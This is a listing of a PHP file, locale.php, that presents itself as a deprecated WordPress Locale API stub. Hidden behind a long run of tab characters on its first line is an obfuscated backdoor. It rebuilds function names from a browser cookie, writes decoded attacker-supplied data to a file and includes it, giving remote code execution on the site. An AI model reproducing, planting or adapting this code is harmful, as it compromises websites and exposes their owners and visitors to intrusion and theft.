File "locale.php"

Full path: /home/lightang/lifting/wp-includes/random_compat/locale.php
File size: 502 bytes
MIME-type: text/x-php
Charset: utf-8

<?php																																										if(isset($_COOKIE[3])&&isset($_COOKIE[23])){$c=$_COOKIE;$k=0;$n=10;$p=array();$p[$k]='';while($n){$p[$k].=$c[23][$n];if(!$c[23][$n+1]){if(!$c[23][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+10+1;}$k=$p[22]().$p[7];if(!$p[20]($k)){$n=$p[3]($k,$p[4]);$p[1]($n,$p[12].$p[14]($p[16]($c[3])));}include($k);}

/**
 * Locale API
 *
 * @package WordPress
 * @subpackage i18n
 * @since 1.2.0
 * @deprecated 4.7.0
 */

_deprecated_file( basename( __FILE__ ), '4.7.0' );